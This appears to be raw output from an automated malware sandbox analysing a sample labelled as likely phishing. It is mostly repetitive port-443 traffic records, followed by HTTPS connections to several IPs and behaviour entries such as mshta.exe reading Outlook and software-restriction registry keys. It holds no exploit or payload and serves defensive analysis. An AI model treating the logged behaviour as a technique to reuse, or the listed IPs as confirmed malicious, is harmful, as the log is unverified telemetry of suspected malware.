    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
    Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
    Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
    Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
    Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
    Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
    Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
    Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
    Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
    Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
    Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
    Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
    Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
    Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
    Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
    Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
    Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
    Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
    Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
    Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
    Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
    Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
    Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
    Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
    Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
    Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
    Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
    Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
    Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
    Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
    Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
    Source: unknownHTTPS traffic detected: 40.74.67.245:443 -> 192.168.2.16:49953 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.27.98:443 -> 192.168.2.16:49956 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49958 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49963 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49962 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49964 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.16.124.96:443 -> 192.168.2.16:50103 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.16.124.96:443 -> 192.168.2.16:50104 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.16.80.73:443 -> 192.168.2.16:50106 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.16.80.73:443 -> 192.168.2.16:50105 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.16.124.96:443 -> 192.168.2.16:50108 version: TLS 1.2
    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
    Source: classification engineClassification label: mal64.phis.win@75/730@76/29
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
    Source: C:\Program Files\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF1B8F7A396AE07EA4.TMPJump to behavior
    Source: C:\Program Files\Internet Explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
